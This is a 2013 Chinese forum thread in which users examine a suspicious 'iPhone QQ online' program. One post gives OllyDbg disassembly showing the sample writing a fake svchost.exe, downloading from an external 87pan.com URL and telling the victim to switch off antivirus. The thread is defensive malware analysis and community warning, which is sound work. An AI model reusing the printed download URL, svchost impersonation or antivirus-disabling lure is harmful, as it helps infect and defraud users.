iPhone qq在线极度可疑

极限度—魔

口条 发表于 2013-2-24 16:37
这两个帖子让我迷糊，首先楼主举报的帖子资源是谁做的？
小A沙箱运行样本，提示修改系统文件，但之后就没 ...

他的确是创建了svchost，后台下载在C:\WINDOWS\system，不知道是不是

1. 00401B4A    55              push ebp
   
2. 00401B4B    8BEC            mov ebp,esp
   
3. 00401B4D    81EC 04000000   sub esp,0x4
   
4. 00401B53    68 04000080     push 0x80000004
   
5. 00401B58    6A 00           push 0x0
   
6. 00401B5A    68 E4365400     push iphoneQQ.005436E4                   ; C:\WINDOWS\system32\svchost.exe
   
7. 00401B5F    68 01000000     push 0x1
   
8. 00401B64    BB C0BC4000     mov ebx,iphoneQQ.0040BCC0
   
9. 00401B69    E8 1C930000     call iphoneQQ.0040AE8A
   
10. 00401B6E    83C4 10         add esp,0x10
    
11. 00401B71    85C0            test eax,eax
    
12. 00401B73    0F84 35000000   je iphoneQQ.00401BAE
    
13. 00401B79    6A 00           push 0x0
    
14. 00401B7B    6A 00           push 0x0
    
15. 00401B7D    6A 00           push 0x0
    
16. 00401B7F    68 02000080     push 0x80000002
    
17. 00401B84    6A 00           push 0x0
    
18. 00401B86    68 00000000     push 0x0
    
19. 00401B8B    68 04000080     push 0x80000004
    
20. 00401B90    6A 00           push 0x0
    
21. 00401B92    68 E4365400     push iphoneQQ.005436E4                   ; C:\WINDOWS\system32\svchost.exe
    
22. 00401B97    68 03000000     push 0x3
    
23. 00401B9C    BB D0B14000     mov ebx,iphoneQQ.0040B1D0
    
24. 00401BA1    E8 E4920000     call iphoneQQ.0040AE8A
    
25. 00401BA6    83C4 28         add esp,0x28
    
26. 00401BA9    E9 D8000000     jmp iphoneQQ.00401C86
    
27. 00401BAE    68 04000080     push 0x80000004
    
28. 00401BB3    6A 00           push 0x0
    
29. 00401BB5    68 2F355400     push iphoneQQ.0054352F                   ; http://dxdown5.87pan.com:888/dl.php?AjAHaQxhCWBVD1VrUj8BOQw8VmlVIFIxD3sPIAVjBicOdANhDHVfNlR3V2FWMwc+VWVXCgdoBmQCOVwxBD9WMgJiBzEMKwljVSNVOFJsAWUMa1ZtVWpSZg8vDyYFdgZoDmgDNAw8X2BUflc3VmsHfVUwV2EHLgY0AmBcZgQyVjUCZwcwDG4JNlVmVTZSaQFnDD9WbFU1UmIPPA9lBWIGMA5tA2U
    
30. 00401BBA    68 01000000     push 0x1
    
31. 00401BBF    B8 02000000     mov eax,0x2
    
32. 00401BC4    BB B00B4500     mov ebx,iphoneQQ.00450BB0
    
33. 00401BC9    E8 C8920000     call iphoneQQ.0040AE96
    
34. 00401BCE    83C4 10         add esp,0x10
    
35. 00401BD1    8945 FC         mov dword ptr ss:[ebp-0x4],eax
    
36. 00401BD4    68 05000080     push 0x80000005
    
37. 00401BD9    6A 00           push 0x0
    
38. 00401BDB    8B45 FC         mov eax,dword ptr ss:[ebp-0x4]
    
39. 00401BDE    85C0            test eax,eax
    
40. 00401BE0    75 05           jnz short iphoneQQ.00401BE7
    
41. 00401BE2    B8 DC365400     mov eax,iphoneQQ.005436DC
    
42. 00401BE7    50              push eax
    
43. 00401BE8    68 04000080     push 0x80000004
    
44. 00401BED    6A 00           push 0x0
    
45. 00401BEF    68 E4365400     push iphoneQQ.005436E4                   ; C:\WINDOWS\system32\svchost.exe
    
46. 00401BF4    68 02000000     push 0x2
    
47. 00401BF9    BB 00BD4000     mov ebx,iphoneQQ.0040BD00
    
48. 00401BFE    E8 87920000     call iphoneQQ.0040AE8A
    
49. 00401C03    83C4 1C         add esp,0x1C
    
50. 00401C06    8B5D FC         mov ebx,dword ptr ss:[ebp-0x4]
    
51. 00401C09    85DB            test ebx,ebx
    
52. 00401C0B    74 09           je short iphoneQQ.00401C16
    
53. 00401C0D    53              push ebx
    
54. 00401C0E    E8 71920000     call iphoneQQ.0040AE84
    
55. 00401C13    83C4 04         add esp,0x4
    
56. 00401C16    6A 00           push 0x0
    
57. 00401C18    6A 00           push 0x0
    
58. 00401C1A    6A 00           push 0x0
    
59. 00401C1C    68 02000080     push 0x80000002
    
60. 00401C21    6A 00           push 0x0
    
61. 00401C23    68 00000000     push 0x0
    
62. 00401C28    68 04000080     push 0x80000004
    
63. 00401C2D    6A 00           push 0x0
    
64. 00401C2F    68 E4365400     push iphoneQQ.005436E4                   ; C:\WINDOWS\system32\svchost.exe
    
65. 00401C34    68 03000000     push 0x3
    
66. 00401C39    BB D0B14000     mov ebx,iphoneQQ.0040B1D0
    
67. 00401C3E    E8 47920000     call iphoneQQ.0040AE8A
    
68. 00401C43    83C4 28         add esp,0x28
    
69. 00401C46    68 04000080     push 0x80000004
    
70. 00401C4B    6A 00           push 0x0
    
71. 00401C4D    68 87375400     push iphoneQQ.00543787                   ; 警告提示：
    
72. 00401C52    68 01030080     push 0x80000301
    
73. 00401C57    6A 00           push 0x0
    
74. 00401C59    68 30000000     push 0x30
    
75. 00401C5E    68 04000080     push 0x80000004
    
76. 00401C63    6A 00           push 0x0
    
77. 00401C65    68 92375400     push iphoneQQ.00543792                   ; 您没有关闭杀毒软件！请关闭杀毒软件在重新使用！
    
78. 00401C6A    68 03000000     push 0x3
    
79. 00401C6F    BB 00BE4000     mov ebx,iphoneQQ.0040BE00
    
80. 00401C74    E8 11920000     call iphoneQQ.0040AE8A
    

复制代码

他貌似还强制收听了他的微博

lfdncj

极限度—魔 发表于 2013-3-2 15:15
他的确是创建了svchost，后台下载在C:\WINDOWS\system，不知道是不是他貌似还强制收听了他的微博

这是用OD载入看到的么？

极限度—魔

lfdncj 发表于 2013-3-2 15:17
这是用OD载入看到的么？

嗯，是阿。不会我不会分析 只能简单看个大概创建了神马

lfdncj

极限度—魔 发表于 2013-3-2 15:19
嗯，是阿。不会我不会分析 只能简单看个大概创建了神马

学会一招又    以后分析病毒也不用去火眼了  看来OD看起来更直接明了方便

极限度—魔

lfdncj 发表于 2013-3-2 15:23
学会一招又    以后分析病毒也不用去火眼了  看来OD看起来更直接明了方便

不过有的人会把这些隐藏了。这样就找不到了。等着高手去分析吧

lfdncj

极限度—魔 发表于 2013-3-2 15:24
不过有的人会把这些隐藏了。这样就找不到了。等着高手去分析吧

你说的隐藏是指加壳么？- -   加壳有自动拖壳查壳的    还是其他的隐藏？

极限度—魔

lfdncj 发表于 2013-3-2 15:25
你说的隐藏是指加壳么？- -   加壳有自动拖壳查壳的    还是其他的隐藏？

是软件加密。 是搜索不了字符串的。加壳也是其中一种

lfdncj

极限度—魔 发表于 2013-3-2 15:46
是软件加密。 是搜索不了字符串的。加壳也是其中一种

哦- -  看来还是得火眼

云月青鸾

看样子要注意下载

lh920215

口条 发表于 2013-2-24 16:52
还是头晕，会处理的
文件一致

版主怎么处理的
永封ID加IP？ 这的给使用者造成多大损失啊 能斩就斩了吧